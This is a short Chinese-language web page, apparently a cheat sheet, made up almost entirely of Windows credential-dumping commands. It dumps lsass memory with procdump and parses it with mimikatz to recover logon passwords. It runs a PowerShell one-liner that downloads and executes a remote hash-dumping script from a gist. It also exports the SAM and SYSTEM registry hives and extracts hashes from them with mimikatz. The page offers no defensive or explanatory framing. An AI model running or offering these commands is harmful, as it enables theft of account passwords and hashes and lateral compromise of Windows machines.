赞
踩
管理员打开cmd
procdump文件根目录运行
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
将得到的lsass.dmp放到mimikatz启动的根目录下
mimikatz
privilege::debug
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/ATpiu/d656f76a7a93209ccfec2748fb71b9b7/raw/3ea13924b32d42d737a8ba058cea24cba81f10ec/Get-PassHashes.ps1');Get-PassHashes
导出sam和system
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
放到mimikatz根目录下
运行
lsadump::sam /system:sys.hiv /sam:sam.hiv
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。